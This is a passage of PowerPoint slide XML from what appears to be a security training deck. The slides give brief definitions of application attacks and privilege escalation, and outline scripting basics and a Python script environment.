          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Screenshot Burp Suite portswigger.net/burp.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1605380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6E7FB-A2D3-4062-B148-31DDF8B1E4C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5D7C762-5E03-4A1D-9B2C-5F1251884B1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="708660"/>
            <a:ext cx="8455566" cy="3501675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks that target vulnerabilities in application code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(An application vulnerability is a design flaw that can cause the application security system to be circumvented or that will cause the application to crash.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege escalation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>The purpose of most application attacks is to allow the threat actor to run his or her own code on the system. This is referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>arbitrary code execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. Where the code is transmitted from one machine to another, it can be referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>remote code execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. The code would be designed to install some sort of backdoor or to disable the system in some way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get privileges from target vulnerable process to run arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Vertical and horizontal privilege escalation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Vertical privilege escalation (or elevation) is where a user or application can access functionality or data that should not be available to them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Horizontal privilege escalation is where a user accesses functionality or data that is intended for another user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0D387E4-E8E5-4203-ACE5-2825A886DD21}"/>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id="{D500F30B-4026-4977-B67A-9C9A5DB12C9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2659301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B5F42-D20C-4F1B-918C-0697B476B645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement Secure Script Environments </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D2FD275-BC49-4117-82BF-7CDA3ABACE03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Topic 14D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F546ED15-AE9F-462D-AEEA-C763588128A1}"/>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id="{EE29C57D-EABC-486D-8BBD-E982E636CB18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2374833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6C5F-57A4-43F6-A452-4B810A2CE104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FEF96B0-DE7F-4A83-B839-1B5C55E18135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automation of activity through programs and scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic elements of a script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameters </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Branching and looping statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validation and error handlers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F0C500B-B45E-4361-BDDB-8DD9F2660421}"/>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id="{68823C7E-B753-4922-AF2B-2B683AEBB6CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3742860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4608BB-B9ED-4324-90C6-A4D16BBB03B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="178030" y="980349"/>
            <a:ext cx="4212815" cy="3889274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic syntax elements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Case sensitivity and indentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assignment and typing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Declaring functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logic and looping statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Comparison operators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control blocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Libraries of functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Within interpreter or compiled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{270DB3EC-6D5B-493A-9F1D-A8F90982A574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python Script Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3058E22-02BD-48BB-BA5E-C8BEBC8EE804}"/>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id="{C30FA403-B5FA-4E13-9071-8EE7FA510817}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CCF4DEA-5171-4CF5-B139-A10C5D506640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4123426" y="1842530"/>
            <a:ext cx="4842544" cy="1893222"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4842544"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1893222"/>
              <a:gd name="connsiteX1" fmla="*/ 489635 w 4842544"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1893222"/>
              <a:gd name="connsiteX2" fmla="*/ 930845 w 4842544"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1893222"/>
              <a:gd name="connsiteX3" fmla="*/ 1565756 w 4842544"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1893222"/>
              <a:gd name="connsiteX4" fmla="*/ 2103816 w 4842544"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1893222"/>
              <a:gd name="connsiteX5" fmla="*/ 2738728 w 4842544"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1893222"/>
              <a:gd name="connsiteX6" fmla="*/ 3131512 w 4842544"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 1893222"/>
              <a:gd name="connsiteX7" fmla="*/ 3524296 w 4842544"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 1893222"/>
              <a:gd name="connsiteX8" fmla="*/ 4159207 w 4842544"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 1893222"/>
              <a:gd name="connsiteX9" fmla="*/ 4842544 w 4842544"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 1893222"/>
              <a:gd name="connsiteX10" fmla="*/ 4842544 w 4842544"/>
              <a:gd name="connsiteY10" fmla="*/ 435441 h 1893222"/>
              <a:gd name="connsiteX11" fmla="*/ 4842544 w 4842544"/>
              <a:gd name="connsiteY11" fmla="*/ 870882 h 1893222"/>
              <a:gd name="connsiteX12" fmla="*/ 4842544 w 4842544"/>
              <a:gd name="connsiteY12" fmla="*/ 1287391 h 1893222"/>
              <a:gd name="connsiteX13" fmla="*/ 4842544 w 4842544"/>
              <a:gd name="connsiteY13" fmla="*/ 1893222 h 1893222"/>
              <a:gd name="connsiteX14" fmla="*/ 4401334 w 4842544"/>
              <a:gd name="connsiteY14" fmla="*/ 1893222 h 1893222"/>
              <a:gd name="connsiteX15" fmla="*/ 3911699 w 4842544"/>
              <a:gd name="connsiteY15" fmla="*/ 1893222 h 1893222"/>
              <a:gd name="connsiteX16" fmla="*/ 3276788 w 4842544"/>
              <a:gd name="connsiteY16" fmla="*/ 1893222 h 1893222"/>
              <a:gd name="connsiteX17" fmla="*/ 2690302 w 4842544"/>
              <a:gd name="connsiteY17" fmla="*/ 1893222 h 1893222"/>
              <a:gd name="connsiteX18" fmla="*/ 2297518 w 4842544"/>
              <a:gd name="connsiteY18" fmla="*/ 1893222 h 1893222"/>
              <a:gd name="connsiteX19" fmla="*/ 1759458 w 4842544"/>
              <a:gd name="connsiteY19" fmla="*/ 1893222 h 1893222"/>
              <a:gd name="connsiteX20" fmla="*/ 1318248 w 4842544"/>
              <a:gd name="connsiteY20" fmla="*/ 1893222 h 1893222"/>
              <a:gd name="connsiteX21" fmla="*/ 683337 w 4842544"/>
              <a:gd name="connsiteY21" fmla="*/ 1893222 h 1893222"/>
              <a:gd name="connsiteX22" fmla="*/ 0 w 4842544"/>
              <a:gd name="connsiteY22" fmla="*/ 1893222 h 1893222"/>
              <a:gd name="connsiteX23" fmla="*/ 0 w 4842544"/>
              <a:gd name="connsiteY23" fmla="*/ 1419917 h 1893222"/>
              <a:gd name="connsiteX24" fmla="*/ 0 w 4842544"/>
              <a:gd name="connsiteY24" fmla="*/ 946611 h 1893222"/>
              <a:gd name="connsiteX25" fmla="*/ 0 w 4842544"/>
              <a:gd name="connsiteY25" fmla="*/ 511170 h 1893222"/>
              <a:gd name="connsiteX26" fmla="*/ 0 w 4842544"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 189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42544" h="1893222" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="139167" y="-40327"/>
                  <a:pt x="285976" y="7362"/>
                  <a:pt x="489635" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="693294" y="-7362"/>
                  <a:pt x="750349" y="7535"/>
                  <a:pt x="930845" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1111341" y="-7535"/>
                  <a:pt x="1290589" y="41829"/>
                  <a:pt x="1565756" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1840923" y="-41829"/>
                  <a:pt x="1882899" y="19434"/>
                  <a:pt x="2103816" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2324733" y="-19434"/>
                  <a:pt x="2573618" y="35624"/>
                  <a:pt x="2738728" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2903838" y="-35624"/>
                  <a:pt x="2998728" y="16669"/>
                  <a:pt x="3131512" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3264296" y="-16669"/>
                  <a:pt x="3420011" y="11840"/>
                  <a:pt x="3524296" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3628581" y="-11840"/>
                  <a:pt x="3961088" y="32872"/>
                  <a:pt x="4159207" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4357326" y="-32872"/>
                  <a:pt x="4639532" y="70463"/>
                  <a:pt x="4842544" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4845001" y="207743"/>
                  <a:pt x="4795586" y="308527"/>
                  <a:pt x="4842544" y="435441"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4889502" y="562355"/>
                  <a:pt x="4834647" y="733762"/>
                  <a:pt x="4842544" y="870882"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4850441" y="1008002"/>
                  <a:pt x="4801309" y="1132044"/>
                  <a:pt x="4842544" y="1287391"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4883779" y="1442738"/>
                  <a:pt x="4838709" y="1712317"/>
                  <a:pt x="4842544" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4734216" y="1902964"/>
                  <a:pt x="4493530" y="1861748"/>
                  <a:pt x="4401334" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4309138" y="1924696"/>
                  <a:pt x="4060481" y="1844957"/>
                  <a:pt x="3911699" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3762917" y="1941487"/>
                  <a:pt x="3502916" y="1863397"/>
                  <a:pt x="3276788" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3050660" y="1923047"/>
                  <a:pt x="2933486" y="1834110"/>
                  <a:pt x="2690302" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2447118" y="1952334"/>
                  <a:pt x="2387613" y="1852775"/>
                  <a:pt x="2297518" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2207423" y="1933669"/>
                  <a:pt x="1985200" y="1840462"/>
                  <a:pt x="1759458" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1533716" y="1945982"/>
                  <a:pt x="1430818" y="1852109"/>
                  <a:pt x="1318248" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1205678" y="1934335"/>
                  <a:pt x="853618" y="1845524"/>
                  <a:pt x="683337" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="513056" y="1940920"/>
                  <a:pt x="248163" y="1813318"/>
                  <a:pt x="0" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-32873" y="1791295"/>
                  <a:pt x="23670" y="1625584"/>
                  <a:pt x="0" y="1419917"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-23670" y="1214251"/>
                  <a:pt x="35240" y="1148411"/>
                  <a:pt x="0" y="946611"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-35240" y="744811"/>
                  <a:pt x="34889" y="681597"/>
                  <a:pt x="0" y="511170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-34889" y="340743"/>
                  <a:pt x="39881" y="233507"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="4842544" h="1893222" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="204175" y="-47055"/>
                  <a:pt x="411761" y="28771"/>
                  <a:pt x="586486" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="761211" y="-28771"/>
                  <a:pt x="833690" y="7716"/>
                  <a:pt x="1076121" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1318553" y="-7716"/>
                  <a:pt x="1448415" y="47721"/>
                  <a:pt x="1711032" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1973649" y="-47721"/>
                  <a:pt x="1947728" y="41770"/>
                  <a:pt x="2103816" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2259904" y="-41770"/>
                  <a:pt x="2356909" y="16069"/>
                  <a:pt x="2545026" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2733143" y="-16069"/>
                  <a:pt x="2856421" y="3807"/>
                  <a:pt x="2986235" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3116049" y="-3807"/>
                  <a:pt x="3358659" y="12490"/>
                  <a:pt x="3572721" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3786783" y="-12490"/>
                  <a:pt x="3828728" y="47055"/>
                  <a:pt x="4013931" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4199134" y="-47055"/>
                  <a:pt x="4457354" y="95779"/>
                  <a:pt x="4842544" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4867189" y="167305"/>
                  <a:pt x="4824931" y="237379"/>
                  <a:pt x="4842544" y="473306"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4860157" y="709233"/>
                  <a:pt x="4828863" y="783754"/>
                  <a:pt x="4842544" y="984475"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4856225" y="1185196"/>
                  <a:pt x="4830931" y="1347086"/>
                  <a:pt x="4842544" y="1476713"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4854157" y="1606340"/>
                  <a:pt x="4827061" y="1754303"/>
                  <a:pt x="4842544" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4722112" y="1946821"/>
                  <a:pt x="4375627" y="1828326"/>
                  <a:pt x="4256058" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4136489" y="1958118"/>
                  <a:pt x="3842890" y="1831081"/>
                  <a:pt x="3669572" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3496254" y="1955363"/>
                  <a:pt x="3433027" y="1871823"/>
                  <a:pt x="3276788" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3120549" y="1914621"/>
                  <a:pt x="2806110" y="1889205"/>
                  <a:pt x="2641877" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2477644" y="1897239"/>
                  <a:pt x="2295782" y="1866516"/>
                  <a:pt x="2152242" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2008702" y="1919928"/>
                  <a:pt x="1781359" y="1879157"/>
                  <a:pt x="1517330" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1253301" y="1907287"/>
                  <a:pt x="1143024" y="1873288"/>
                  <a:pt x="979270" y="1893222"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="815516" y="1913156"/>
                  <a:pt x="457575" y="1807105"/>
                  <a:pt x="0" y="1893222"/>
